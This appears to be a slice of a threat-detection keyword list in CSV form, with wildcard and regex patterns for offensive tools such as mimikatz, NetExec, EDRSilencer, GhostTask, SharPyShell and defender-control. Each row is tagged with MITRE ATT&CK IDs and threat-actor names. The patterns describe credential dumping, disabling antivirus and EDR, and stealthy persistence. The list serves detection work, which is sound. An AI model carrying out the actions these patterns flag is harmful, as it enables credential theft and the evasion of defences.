"*net::deleg*",".{0,1000}net\:\:deleg.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53088"
"*net::group*",".{0,1000}net\:\:group.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53089"
"*net::if*",".{0,1000}net\:\:if.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53090"
"*net::serverinfo*",".{0,1000}net\:\:serverinfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53091"
"*net::session*",".{0,1000}net\:\:session.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53092"
"*net::share*",".{0,1000}net\:\:share.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53093"
"*net::stats*",".{0,1000}net\:\:stats.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53094"
"*net::tod*",".{0,1000}net\:\:tod.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53095"
"*net::trust*",".{0,1000}net\:\:trust.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53096"
"*net::user*",".{0,1000}net\:\:user.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53097"
"*net::wsession*",".{0,1000}net\:\:wsession.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","53098"
"*net_dclist *",".{0,1000}net_dclist\s.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","53099"
"*net_localgroup_member -Group*",".{0,1000}net_localgroup_member\s\-Group.{0,1000}","offensive_tool_keyword","mythic","A .NET Framework 4.0 Windows Agent","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Apollo/","1","0","N/A","N/A","10","10","472","100","2025-04-10T19:47:06Z","2020-11-09T08:05:16Z","53100"
"*net_portscan */24*",".{0,1000}net_portscan\s.{0,1000}\/24.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","53101"
"*net_portscan.py*",".{0,1000}net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","53102"
"*net_recon.*",".{0,1000}net_recon\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","53103"
"*net1 stop badrv*",".{0,1000}net1\sstop\sbadrv.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","53123"
"*netbiosX/AMSI-Provider*",".{0,1000}netbiosX\/AMSI\-Provider.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","1","N/A","N/A","10","2","150","16","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z","53136"
"*netero1010/EDRSilencer*",".{0,1000}netero1010\/EDRSilencer.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","53140"
"*netero1010/GhostTask*",".{0,1000}netero1010\/GhostTask.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","53141"
"*netero1010/Quser-BOF*",".{0,1000}netero1010\/Quser\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","N/A","10","10","85","11","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z","53142"
"*netero1010/SCCMVNC*",".{0,1000}netero1010\/SCCMVNC.{0,1000}","offensive_tool_keyword","SCCMVNC","A tool to modify SCCM remote control settings on the client machine - enabling remote control without permission prompts or notifications. This can be done without requiring access to SCCM server.","T1078 - T1562 - T1557","TA0005 - TA0003 - TA0008","N/A","N/A","Lateral Movement","https://github.com/netero1010/SCCMVNC","1","1","N/A","N/A","8","1","87","10","2024-10-20T14:29:43Z","2024-10-20T14:15:28Z","53143"
"*netero1010/ScheduleRunner*",".{0,1000}netero1010\/ScheduleRunner.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 - T1570 - T1021 - T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","1","N/A","N/A","9","4","336","46","2025-01-22T02:06:59Z","2021-10-12T15:27:32Z","53144"
"*netero1010/ServiceMove-BOF*",".{0,1000}netero1010\/ServiceMove\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","53145"
"*NetExec ldap * --*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53146"
"*NetExec ldap * --dc-ip*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-\-dc\-ip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53147"
"*NetExec ldap * -M enum_trusts*",".{0,1000}NetExec\sldap\s.{0,1000}\s\-M\senum_trusts.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53148"
"*netexec smb *",".{0,1000}netexec\ssmb\s.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53149"
"*NetExec winrm *--*",".{0,1000}NetExec\swinrm\s.{0,1000}\-\-.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53150"
"*NetExec-main.zip*",".{0,1000}NetExec\-main\.zip.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","53151"
